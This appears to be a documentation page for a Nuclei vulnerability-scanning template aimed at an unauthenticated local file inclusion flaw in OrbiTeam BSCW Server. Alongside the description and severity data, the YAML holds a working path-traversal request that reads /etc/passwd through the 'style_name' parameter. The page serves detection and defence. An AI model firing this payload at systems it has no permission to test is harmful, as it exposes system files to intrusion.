OrbiTeam BSCW Server - Local File Inclusion
ID: orbiteam-bscw-server-lfi
Severity: high
Author: 0x_Akoko
Tags: bscw,orbiteam,lfi,unauth,packetstorm,xss
Description
Section titled “Description”OrbiTeam BSCW Server versions 5.0.x, 5.1.x, 5.2.4 and below, 7.3.x and below, and 7.4.3 and below are vulnerable to unauthenticated local file inclusion.
YAML Source
Section titled “YAML Source”id: orbiteam-bscw-server-lfi
info: name: OrbiTeam BSCW Server - Local File Inclusion author: 0x_Akoko severity: high description: | OrbiTeam BSCW Server versions 5.0.x, 5.1.x, 5.2.4 and below, 7.3.x and below, and 7.4.3 and below are vulnerable to unauthenticated local file inclusion. reference: - https://packetstormsecurity.com/files/165156/OrbiTeam-BSCW-Server-XSS-LFI-User-Enumeration.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 metadata: max-request: 1 tags: bscw,orbiteam,lfi,unauth,packetstorm,xss
http: - method: GET path: - "{{BaseURL}}/pub/bscw.cgi/30?op=theme&style_name=../../../../../../../../etc/passwd"
matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0"
- type: status status: - 200# digest: 4b0a00483046022100e6319ad605a77bd64cccc51794d12ec8ddc9a0ed182b03c7cce06503e6663317022100c8a176c9b35e8dd016b99b46e5fd32b1af7b7c02ceb61de26e62d00817b4a9fc:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml"